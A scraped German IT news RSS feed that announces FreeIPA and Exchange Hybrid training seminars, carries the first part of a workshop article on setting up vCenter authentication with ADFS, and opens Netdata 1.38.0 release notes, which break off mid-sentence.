    <ul class="links field__items"><li><a href="https://www.it-administrator.de/fachartikel" hreflang="en">Fachartikel</a></li>
      </ul></div>  <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/article-229353" rel="tag" title="Im Test: Univention Corporate Server 4.2" hreflang="en">Weiterlesen<span class="visually-hidden"> über Im Test: Univention Corporate Server 4.2</span></a></li></ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Online-Training "Domaincontroller für Linux-Umgebungen mit FreeIPA"]]></title>
<description><![CDATA[Online-Training "Domaincontroller für Linux-Umgebungen mit FreeIPA" 

      
      
        
          
            
                

            
          
        
              
    
  Redaktion IT-A…
Mo., 17.05.2021 - 00:00

            Unser Training "Domaincontroller für Linux-Umgebungen ...]]></description>
<link>https://tsecurity.de/de/1860056/server/online-training-domaincontroller-fuer-linux-umgebungen-mit-freeipa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1860056/server/online-training-domaincontroller-fuer-linux-umgebungen-mit-freeipa/</guid>
<pubDate>Wed, 12 Apr 2023 18:45:21 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">Online-Training "Domaincontroller für Linux-Umgebungen mit FreeIPA" </span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/article-352177"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/online_training_freeipa.jpg?itok=3XI8F5-2" width="480" height="319" alt="Im Training erfahren Sie, wie sich auch Linux-Clients komfortabel und sicher verwalten lassen." title="Im Training erfahren Sie, wie sich auch Linux-Clients komfortabel und sicher verwalten lassen." typeof="foaf:Image" class="image-style-medium"><span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/108" lang="" about="https://www.it-administrator.de/user/108" typeof="schema:Person" property="schema:name" datatype="" content="Redaktion IT-Administrator" class="username" xml:lang="">Redaktion IT-A…</a></span>
<span class="field field--name-created field--type-created field--label-hidden">Mo., 17.05.2021 - 00:00</span>

            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Unser Training "Domaincontroller für Linux-Umgebungen mit FreeIPA"
demonstriert praxisnah, wie sich Linux-Clients via Domaincontroller
ähnlich komfortabel und ähnlich hohen Sicherheitsstandards
verwalten lassen wie etwa das Active Directory.  Dabei erhalten Sie
zunächst Einführung in LDAP,Kerberos und X.509. Die
Veranstaltung findet am 29. Juli 2021 online statt. Buchen Sie schnell, um sich noch einen Platz zu sichern – für Abonnenten
gilt wie immer ein Sondertarif.</div>
      <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items"><li><a href="https://www.it-administrator.de/tips-tools" hreflang="en">Tipps &amp; Tools</a></li>
      </ul></div>  <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/article-352177" rel="tag" title="Online-Training " domaincontroller f linux-umgebungen mit freeipa hreflang="en">Weiterlesen<span class="visually-hidden"> über Online-Training "Domaincontroller für Linux-Umgebungen mit FreeIPA" </span></a></li></ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Online-Training "Domaincontroller für Linux-Umgebungen mit FreeIPA"]]></title>
<description><![CDATA[Online-Training "Domaincontroller für Linux-Umgebungen mit FreeIPA" 

      
      
        
          
            
                

            
          
        
              
    
  Redaktion IT-A…
Mo., 12.07.2021 - 00:00

            Unser Training "Domaincontroller für Linux-Umgebungen ...]]></description>
<link>https://tsecurity.de/de/1859970/server/online-training-domaincontroller-fuer-linux-umgebungen-mit-freeipa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1859970/server/online-training-domaincontroller-fuer-linux-umgebungen-mit-freeipa/</guid>
<pubDate>Wed, 12 Apr 2023 18:44:13 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">Online-Training "Domaincontroller für Linux-Umgebungen mit FreeIPA" </span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/article-352293"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/TrainingFreeIPA.jpg?itok=U6m_ZFvh" width="480" height="319" alt="Im Training erfahren Sie, wie sich auch Linux-Clients komfortabel und sicher verwalten lassen." title="Im Training erfahren Sie, wie sich auch Linux-Clients komfortabel und sicher verwalten lassen." typeof="foaf:Image" class="image-style-medium"><span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/108" lang="" about="https://www.it-administrator.de/user/108" typeof="schema:Person" property="schema:name" datatype="" content="Redaktion IT-Administrator" class="username" xml:lang="">Redaktion IT-A…</a></span>
<span class="field field--name-created field--type-created field--label-hidden">Mo., 12.07.2021 - 00:00</span>

            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Unser Training "Domaincontroller für Linux-Umgebungen mit FreeIPA" demonstriert praxisnah, wie sich Linux-Clients via Domaincontroller ähnlich komfortabel und unter ähnlich hohen Sicherheitsstandards verwalten lassen wie etwa das Active Directory. Dabei erhalten Sie zunächst eine Einführung in LDAP, Kerberos und X.509. Die Veranstaltung findet bereits am 29. Juli 2021 online statt. Buchen Sie jetzt noch schnell, um sich einen Platz zu sichern – für Abonnenten gilt wie immer ein Sondertarif.</div>
      <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items"><li><a href="https://www.it-administrator.de/tips-tools" hreflang="en">Tipps &amp; Tools</a></li>
      </ul></div>  <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/article-352293" rel="tag" title="Online-Training " domaincontroller f linux-umgebungen mit freeipa hreflang="en">Weiterlesen<span class="visually-hidden"> über Online-Training "Domaincontroller für Linux-Umgebungen mit FreeIPA" </span></a></li></ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Online-Intensivseminar "Exchange Hybrid"]]></title>
<description><![CDATA[Online-Intensivseminar "Exchange Hybrid" 

    
    
            
      
                  Vor 4 Monaten
          von Redaktion IT-A…

                                   
    Tipps & Tools
      
              
      
    
      
        
    
            Immer mehr Unternehmen weiten ihre lokal...]]></description>
<link>https://tsecurity.de/de/1859017/server/online-intensivseminar-exchange-hybrid/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1859017/server/online-intensivseminar-exchange-hybrid/</guid>
<pubDate>Wed, 12 Apr 2023 18:26:55 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<article data-history-node-id="33114" role="article" lang="en" about="https://www.it-administrator.de/article-371792" class="node node--type-mt-post node--promoted node--view-mode-teaser clearfix" xml:lang="en"><div class="node-content">
          <div class="teaser-image-wrapper">
      
      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/article-371792"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/onlineseminar.jpg?itok=NM9MmP2G" width="480" height="319" alt="Exchange-Admins erwartet Mitte Februar 2023 ein intensiver Rundumschlag in Sachen Hybridstellung der Groupware." title="Exchange-Admins erwartet Mitte Februar 2023 ein intensiver Rundumschlag in Sachen Hybridstellung der Groupware." typeof="foaf:Image" class="image-style-medium"><span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  
    </div>
      <header><h2 class="node__title title">
      <a href="https://www.it-administrator.de/article-371792" rel="bookmark"><span class="field field--name-title field--type-string field--label-hidden">Online-Intensivseminar "Exchange Hybrid" </span>
</a>
    </h2>
    
            <div class="node__meta">
      <span class="post-info">
                  <span>Vor 4 Monaten</span>
          <span>von <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/108" lang="" about="https://www.it-administrator.de/user/108" typeof="schema:Person" property="schema:name" datatype="" content="Redaktion IT-Administrator" class="username" xml:lang="">Redaktion IT-A…</a></span>
</span>
                                  <span class="node-info-item node-info-item-term"><i class="fa fa-tags"></i> <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items"><li><a href="https://www.it-administrator.de/tips-tools" hreflang="en">Tipps &amp; Tools</a></li>
      </ul></div></span>
              </span>
      
    </div>
      </header><div class="node__content clearfix">
        <div class="with-image">
    
            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Immer mehr Unternehmen weiten ihre lokale Exchange-Struktur in die Cloud aus oder denken darüber nach. Deshalb bringt unser neues Intensivseminar Ihnen den Umgang mit Microsofts Groupware-Umgebung im hybriden Betrieb näher. Dazu stellt das Onlinetraining Mitte Februar lokale und cloudbasierte Features der Serversoftware vor, klärt die Voraussetzungen für eine Exchange-Hybrid-Umgebung und lässt eine solche schließlich exemplarisch entstehen. Die Teilnehmerzahl ist begrenzt, sichern Sie sich also Ihren Platz. Abonnenten nehmen wie immer zum Vorzugspreis teil.</div>
      
  </div>
        <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/article-371792" rel="tag" title="Online-Intensivseminar " exchange hybrid hreflang="en">Weiterlesen<span class="visually-hidden"> über Online-Intensivseminar "Exchange Hybrid" </span></a></li></ul></div>

    </div>
  </div>
</article>]]></content:encoded>
</item>
<item>
<title><![CDATA[Online-Intensivseminar »Domaincontroller mit FreeIPA«]]></title>
<description><![CDATA[Online-Intensivseminar »Domaincontroller mit FreeIPA«

    
    
            
      
                  Vor 1 Monat
          von Redaktion IT-A…

                                   
    Tipps & Tools
      
              
      
    
      
        
    
            Unser Intensivseminar "Domainc...]]></description>
<link>https://tsecurity.de/de/1858906/server/online-intensivseminar-domaincontroller-mit-freeipa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1858906/server/online-intensivseminar-domaincontroller-mit-freeipa/</guid>
<pubDate>Wed, 12 Apr 2023 18:23:52 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<article data-history-node-id="37878" role="article" lang="en" about="https://www.it-administrator.de/article-379321" class="node node--type-mt-post node--promoted node--view-mode-teaser clearfix" xml:lang="en"><div class="node-content">
          <div class="teaser-image-wrapper">
      
      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/article-379321"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/shop009-Bild-120001462_s.jpg?itok=jh94lVWI" width="480" height="319" alt="Im Online-Intensivseminar erfahren Sie, wie sich auch Linux-Clients komfortabel und sicher verwalten lassen." title="Im Online-Intensivseminar erfahren Sie, wie sich auch Linux-Clients komfortabel und sicher verwalten lassen." typeof="foaf:Image" class="image-style-medium"><span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  
    </div>
      <header><h2 class="node__title title">
      <a href="https://www.it-administrator.de/article-379321" rel="bookmark"><span class="field field--name-title field--type-string field--label-hidden">Online-Intensivseminar »Domaincontroller mit FreeIPA«</span>
</a>
    </h2>
    
            <div class="node__meta">
      <span class="post-info">
                  <span>Vor 1 Monat</span>
          <span>von <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/108" lang="" about="https://www.it-administrator.de/user/108" typeof="schema:Person" property="schema:name" datatype="" content="Redaktion IT-Administrator" class="username" xml:lang="">Redaktion IT-A…</a></span>
</span>
                                  <span class="node-info-item node-info-item-term"><i class="fa fa-tags"></i> <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items"><li><a href="https://www.it-administrator.de/tips-tools" hreflang="en">Tipps &amp; Tools</a></li>
      </ul></div></span>
              </span>
      
    </div>
      </header><div class="node__content clearfix">
        <div class="with-image">
    
            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Unser Intensivseminar "Domaincontroller für Linux-Umgebungen mit FreeIPA" zeigt, wie sich Linux-Clients via Domaincontroller ähnlich komfortabel und sicher verwalten lassen wie etwa mit dem Active Directory. Dabei erhalten Sie zunächst eine Einführung in LDAP, Kerberos und X.509. Die nächste Veranstaltung findet bereits am 19. April 2023 online statt.</div>
      
  </div>
        <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/article-379321" rel="tag" title="Online-Intensivseminar »Domaincontroller mit FreeIPA«" hreflang="en">Weiterlesen<span class="visually-hidden"> über Online-Intensivseminar »Domaincontroller mit FreeIPA«</span></a></li></ul></div>

    </div>
  </div>
</article>]]></content:encoded>
</item>
<item>
<title><![CDATA[Moderne vCenter-Anmeldung mit ADFS (1)]]></title>
<description><![CDATA[Moderne vCenter-Anmeldung mit ADFS (1)

            Die Verbundauthentifizierung mit SAML ist für vSphere gewohntes Terrain. Schließlich authentifizieren sich seit vSphere 5 sowohl einzelne Komponenten des vCenter als auch zahlreiche VMware-eigene Produkte und Partnerintegrationen gegenüber dem v...]]></description>
<link>https://tsecurity.de/de/1849293/server/moderne-vcenter-anmeldung-mit-adfs-1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1849293/server/moderne-vcenter-anmeldung-mit-adfs-1/</guid>
<pubDate>Tue, 04 Apr 2023 16:42:41 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">Moderne vCenter-Anmeldung mit ADFS (1)</span>

            <div class="clearfix text-formatted field field--name-field-mt-subheader-body field--type-text-with-summary field--label-hidden field__item"><p>Die Verbundauthentifizierung mit SAML ist für vSphere gewohntes Terrain. Schließlich authentifizieren sich seit vSphere 5 sowohl einzelne Komponenten des vCenter als auch zahlreiche VMware-eigene Produkte und Partnerintegrationen gegenüber dem vCenter-Single-Sign-on. Mit vSphere 7 stehen nun auch die Active-Directory-Verbunddienste für die vCenter-Authentifizierung bereit. Im ersten Teil erklären wir die Grundlagen der Authentifizierung mittels ADFS und zeigen, wie Sie die ADFS-Infrastruktur planen und das Active Directory vorbereiten.</p></div>
      <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/108" lang="" about="https://www.it-administrator.de/user/108" typeof="schema:Person" property="schema:name" datatype="" content="Redaktion IT-Administrator" class="username" xml:lang="">Redaktion IT-A…</a></span>
<span class="field field--name-created field--type-created field--label-hidden">Mo., 03.04.2023 - 07:27</span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/sites/default/files/vCenterAnmeldungADFS-b00v2.jpg"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/large/public/vCenterAnmeldungADFS-b00v2.jpg?itok=ZM9Y7Qu2" width="840" height="560" alt="Moderne vCenter-Anmeldung mit ADFS" title="Eine lokale Anmeldung am vCenter ist auch mit ADFS weiterhin möglich." typeof="foaf:Image" class="image-style-large"><span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  
            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Mit dem bisherigen vCenter-Single-Sign-on (SSO) konnten Administratoren eine interaktive Anmeldung mit Benutzernamen und Kennwort am vCenter-eigenen oder an einem anderen LDAP-fähigen Verzeichnis durchführen. Diese Möglichkeit besteht weiterhin und die Auswahl an möglichen Verzeichnisquellen umfasst das Active Directory (mit integrierter Windows-Authentifizierung oder mittels LDAP) und openLDAP. Das vCenter-SSO stellt diese Anmeldung anderen angeschlossenen Komponenten mittels SAML zur Verfügung.</p>

<p>Mithilfe des "Enhanced Authentication Plug-in", das seit vSphere 6.5 das "Client Integration Plug-in" ablöst, lässt sich die Anmeldung der aktuellen Desktopsitzung an das vCenter-SSO weiterreichen. Eine weitere Funktion des Plug-ins ist die Integration der Anmeldung mit Smartcards. Im Gegensatz zum Vorgänger ist das neue Plug-in ausschließlich für Windows verfügbar. Es ist anscheinend seit der Version 6.7 nicht weiterentwickelt worden, jedenfalls zeigt der aus dem vCenter-7-Web-Client heruntergeladene Installer diese Version nach wie vor an.</p>

<p>Weder die interaktive noch die automatische Anmeldung mit dem Plug-in bieten allerdings Features, die für ein modernes Identity- und Access-Management (IAM) unabdingbar sind: die Integration verschiedener Authentifizierungsverfahren wie zum Beispiel MFA-Token und deren Verwendung in Kombination, abhängig von der Identität des Zugreifenden und der Netzwerk-Location, von der der Zugriff erfolgt. Ein anderes VMware-Produkt, VMware IDM, das die Authentifizierung etwa für vRealize Automation oder WorkspaceONE durchführt, verfügt über diese Funktionalität, ist jedoch nicht ins vCenter integrierbar.</p>

<p>In dem Bestreben, moderne und sichere Authentifizierung für das vCenter anzubieten, geht VMware mit vSphere 7 einen anderen Weg und setzt auf eine Technologie, die viele Unternehmen bereits in ihren IT-Infrastrukturen umgesetzt haben – die Microsoft Active Directory Federation Services (ADFS).</p>

<p><strong>Authentifizierung mittels ADFS</strong><br>
ADFS bietet (nicht nur Web-)Anwendungen die Möglichkeit, den aufrufenden User gegen ein Verzeichnis zu authentifizieren, ohne dass die Anwendung selbst Kontakt zu diesem Verzeichnis aufnehmen muss. Das geschieht im einfachsten Fall mittels "Claims": Zwischen der Applikation (Service Provider; SP, manchmal auch Relying Party; RP) und der ADFS-Infrastruktur (Identity Provider; IdP) besteht eine Vertrauensbeziehung, die im Zuge der Integration der Anwendung mit ADFS durch den Austausch eines gemeinsamen Geheimnisses etabliert wird. Beim Aufruf des SP wird die Sitzung des Users zum IdP weitergeleitet, wo er sich mit seinen Active-Directory-Anmeldedaten und gegebenenfalls weiteren Faktoren wie Token, SMS oder Smartcard authentifizieren muss. An dieser Stelle lässt sich die Identität des Nutzers und der Netzwerkbereich, aus dem er zugreift, auswerten. In Abhängigkeit von diesen Faktoren wird zum Beispiel ein zweiter Faktor gefordert (externer Zugriff) oder ein Kerberos-Passthrough im Browser zugelassen (Intranet).</p>

<p>Nach erfolgreicher Authentifizierung generiert der IdP einen Token und leitet die Benutzersitzung zum SP zurück. Bei Webanwendungen wird der Token einfach an die URL angehängt. Im Token können neben einem identifizierenden Merkmal wie Benutzername oder E-Mail-Adresse auch weitere Informationen enthalten sein. An dieser Stelle sind auch Transformationen ein sehr mächtiger Mechanismus: Damit lässt sich der Benutzername, der im Token übermittelt wird, an das Format des SP anpassen, sodass dieser ihn sofort auswerten kann.</p>

<p>Die Integration mit dem vCenter unterstützt ADFS auf Basis von Windows Server 2016 oder neuer, denn diese basiert auf dem "OpenID Connect"-Protokoll, das erst mit Server 2016 implementiert wurde. Eine genaue Beschreibung von OpenID in ADFS <a href="https://learn.microsoft.com/de-de/windows-server/identity/ad-fs/development/ad-fs-openid-connect-oauth-concepts">ist hier</a> zu finden. Das neue Authentifizierungsverfahren betrifft nur die Anmeldung am Web-Client. Die PowerCLI-Verbindungen und REST-API-Integrationen verwenden weiterhin die herkömmlichen Authentifizierungsmechanismen.</p>

<p><strong>ADFS-Infrastruktur planen</strong><br>
Der Aufbau einer ADFS-Bereitstellung ist eine umfangreiche Aufgabe, die einer sorgfältigen Planung bedarf. Schließlich geht es dabei um eine möglichst sichere und performante Anmeldung an wichtigen Webdiensten. Falls Ihre IT-Landschaft noch über keine ADFS-Infrastruktur verfügt, klären Sie am besten ab, welche weiteren Applikationen in naher Zukunft von der Einführung einer Verbundauthentifizierung profitieren. Davon hängen unter anderem folgende Merkmale Ihres zukünftigen ADFS-Deployment ab:</p>

<ul><li>Hochverfügbarkeit: ADFS lässt sich in Form einer Farm aus mehreren Servern oder sogar als georedundanter Dienst bereitstellen.</li>
	<li>Datenbank: ADFS unterstützt sowohl die Windows Internal Database (WID) als auch den SQL Server als Datenbank-Unterbau. Je nachdem, welche Features Sie benötigen, sollten Sie von Anfang an die passende Technologie wählen.</li>
	<li>Zusätzliche Authentifizierungsverfahren: Falls Sie beabsichtigen, Multifaktor-Authentifizierung für Ihre Webanwendungen mittels ADFS anzubieten, sollten Sie die benötigten Dienste und Systeme bereits vorab konfigurieren und testen. Dann klappt die Einbindung in ADFS nahtlos und Sie müssen nicht unnötig Zeit mit Troubleshooting verbringen.</li>
	<li>Bereitstellung eines Web Application Proxy (früher ADFS-Proxy): Soll die Authentifizierung aus unsicheren Netzsegmenten (Internet, DMZ, Partnerfirmen) möglich sein, sollten Sie unbedingt den Web Application Proxy bereitstellen.</li>
</ul><p>Viele Details der ADFS-Planung und -Bereitstellung inklusive Georedundanz-Optionen sind <a href="https://learn.microsoft.com/de-de/windows-server/identity/active-directory-federation-services">in Microsoft Docs</a> beschrieben. Lassen Sie sich jedoch beim Lesen der Dokumentation von den Überschriften zu Server 2012 und 2012R2 nicht verunsichern: In der Dokumentation sind Artikel speziell für ADFS 2016 und sogar 2019 versteckt.</p>
<figure role="group" class="caption caption-img align-left"><img alt="Eine gemeinsame Authentifizierungsseite für alle Applikationen gibt es nun auch für das vCenter." data-entity-type="file" data-entity-uuid="3130b70c-1348-466a-a402-f08acb7749c4" src="https://www.it-administrator.de/sites/default/files/inline-images/vCenterAnmeldungADFS-b01.jpg" width="1014" height="701" loading="lazy"><figcaption>Bild 1: Eine gemeinsame Authentifizierungsseite für alle Applikationen gibt es nun auch für das vCenter.</figcaption></figure><p> </p>

<p>Für eine einfache kleine Umgebung ohne besondere Ansprüche existieren zahlreiche Schritt-für-Schritt-Anleitungen im Internet, etwa dieses <a href="https://www.anreiter.at/active-directory-federation-services-adfs-installieren/">sehr gut ausgearbeitetes Beispiel</a> auf Deutsch. Das Thema "SSL-Zertifikat" wird dort allerdings nicht behandelt, bitte beachten Sie bei der Beantragung und Ausstellung des Zertifikats für Ihr ADFS unbedingt die <a href="https://learn.microsoft.com/de-de/windows-server/identity/ad-fs/design/certificate-requirements-for-federation-servers">folgenden Anforderungen</a>.</p>

<p>Das Einbinden der ADFS-Authentifizierung in Ihr vCenter ist ein einfacher Prozess, der vier Schritte umfasst. Diese zeigen wir Ihnen in den folgenden Abschnitten. Sie müssen keine Downtime des vCenters für die Maßnahme einplanen. Lediglich die Anmeldung neuer Administrator-Sitzungen wird für wenige Minuten nicht möglich sein. Bestehende Sitzungen im Web-Client unterbricht der Vorgang nicht. Die offizielle Beschreibung der Prozedur <a href="https://docs.vmware.com/en/VMware-vSphere/7.0/com.vmware.vsphere.authentication.doc/GUID-C5E998B2-1148-46DC-990E-A5DB71F93351.html">finden Sie hier</a>.</p>

<p><strong>Das Active Directory vorbereiten</strong><br>
Der Umfang der notwendigen AD-Vorbereitungsarbeiten hängt davon ab, ob und wie Sie das AD bereits in das vCenter eingebunden haben. Nutzen Sie das AD als Identitätsquelle im LDAP-Modus, sind alle notwendigen Vorrichtungen bereits vorhanden. Sie müssen allerdings die Anmeldedaten des Accounts zur Hand haben, den Sie für den LDAP-Bind verwenden. Diese Daten fragt die Einrichtung noch einmal ab.</p>

<p>Haben Sie das AD noch gar nicht angebunden oder nutzen Sie die integrierte Windows-Authentifizierung (IWA), benötigen Sie für die ADFS-Integration einen LDAP-Bind-User. Dieser braucht keine besonderen Rechte, lediglich sein Kennwort darf nicht ablaufen (ein typischer Fall von "Service-Account"). Bereiten Sie auch Gruppen vor, denen Sie im vCenter Rollen und Berechtigungen zuweisen werden und füllen Sie diese Gruppen mit ihren jeweiligen Mitgliedern. Auch das haben Sie möglicherweise bereits erledigt, wenn Sie die AD-Integration ohne ADFS betreiben.</p>

<p>Im letzten Schritt bauen Sie eine LDAP-Verbindung zwischen Ihrem vCenter und dem Active Directory auf. Dies sollte nach Möglichkeit verschlüsselt erfolgen. Kopieren Sie die LDAPS-Zertifikate aller Domaincontroller, zu denen das vCenter Verbindungen aufbauen soll, im Base64-kodierten Format. Sie können im vCenter nur ein Verbindungsziel für LDAP(S) erfassen, aber mehrere Zertifikate eintragen. Falls Sie Loadbalancing für LDAPS eingerichtet haben, benötigen Sie möglicherweise noch das Zertifikat des virtuellen LDAPS-Servers.</p>

<p><em>jp/ln/Evgenij Smirnov</em></p>

<p><em><strong><a href="https://www.it-administrator.de/Moderne-vCenter-Anmeldung-mit-ADFS-2">Im zweiten Teil</a> der Workshop-Serie schildern wir die notwendigen Arbeiten am vCenter und beschreiben, wie Sie ADFS für vCenter-SSO aktivieren und Berechtigungen vergeben.</strong></em></p></div>
      <div class="field field--name-field-tags field--type-entity-reference field--label-above field--entity-reference-target-type-taxonomy-term clearfix">
      <h3 class="field__label">Tags</h3>
    <ul class="links field__items"><li><a href="https://www.it-administrator.de/taxonomy/term/38" hreflang="en">Virtualisierung</a></li>
          <li><a href="https://www.it-administrator.de/taxonomy/term/300" hreflang="en">Authentifizierung</a></li>
          <li><a href="https://www.it-administrator.de/taxonomy/term/301" hreflang="en">ADFS</a></li>
      </ul></div><div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items"><li><a href="https://www.it-administrator.de/fachartikel" hreflang="en">Fachartikel</a></li>
      </ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Netdata release 1.38.0]]></title>
<description><![CDATA[Release Notes edited for brevity, original links maintained. Full Release notes at https://github.com/netdata/netdata/releases/tag/v1.38.0 ​ Highlights:  DBENGINE v2 The new open-source database engine for Netdata Agents, offering huge performance, scalability and stability improvements, with a f...]]></description>
<link>https://tsecurity.de/de/1784336/linux-tipps/netdata-release-1380/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1784336/linux-tipps/netdata-release-1380/</guid>
<pubDate>Mon, 06 Feb 2023 20:15:55 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Release Notes edited for brevity, original links maintained.</p> <p><em>Full Release notes at</em> <a href="https://github.com/netdata/netdata/releases/tag/v1.38.0"><em>https://github.com/netdata/netdata/releases/tag/v1.38.0</em></a></p> <p>​</p> <p>Highlights: </p> <ul><li><a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#v1380-dbenginev2"><strong>DBENGINE v2</strong></a><br> The new open-source database engine for Netdata Agents, offering huge performance, scalability and stability improvements, with a fraction of memory footprint!</li> <li><a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#v1380-functions"><strong>FUNCTION: Processes</strong></a><br> Netdata beyond metrics! We added the ability for <strong>runtime functions</strong>, that can be implemented by any data collection plugin, to offer unlimited visibility to anything, even not-metrics, that can be valuable while troubleshooting.</li> <li><a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#v1380-feed"><strong>Events Feed</strong></a><br> Centralized view of Space and Infrastructure level events about topology changes and alerts.</li> <li><a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#v1380-notifications"><strong>NOTIFICATIONS: Slack, PagerDuty, Discord, Webhooks</strong></a><br> Netdata Cloud now supports <strong>Slack</strong>, <strong>PagerDuty</strong>, <strong>Discord</strong>, <strong>Webhooks</strong>.</li> <li><a href="https://github.com/netdata/netdata/releases/tag/v1.38.0#v1380-rbac"><strong>Role-based access model</strong></a><br> Netdata Cloud supports more roles, offering finer control over access to infrastructure.<br></li> </ul><h3>Netdata open-source growth</h3> <ul><li>Almost 62,000 GitHub Stars</li> <li>Over four million monitored servers</li> <li>Almost 88 million sessions served</li> <li>Over 600 thousand total nodes in Netdata Cloud</li> </ul><h2>Release highlights</h2> <h3>Dramatic performance and stability improvements, with a smaller agent footprint</h3> <p>We completely reworked our custom-made, time series database (dbengine), resulting in stunning improvements to performance, scalability, and stability, while at the same time significantly reducing the <a href="https://github.com/netdata/netdata/tree/master/database/engine#memory-requirements">agent memory requirements</a>.</p> <p>On production-grade hardware (e.g. 48 threads, 32GB ram) Netdata Agent Parents can easily collect 2 million points/second while servicing data queries for 10 million points / second, and running ML training and Health querying 1 million points / second each!</p> <p>For standalone installations, the 64bit version of Netdata runs stable at about 150MB RAM (Reside Set Size + SHARED), with everything enabled (the 32bit version at about 80MB RAM, again with everything enabled).</p> <p>​</p> <p><a href="https://preview.redd.it/9rgk6i3h7mga1.png?width=2439&amp;format=png&amp;auto=webp&amp;s=801420291d1670746611e8ce4b472f207a8dbeb0">DBENGINE v2</a></p> <h3>Functions</h3> <p>After the groundwork done on the Netdata Agent in v1.37.0, Netdata Agent collectors are able to expose functions that can be executed on-demand, at run-time, by the data collecting agent, even when queries are executed via a Netdata Agent Parent. We are now utilizing this capability to provide the 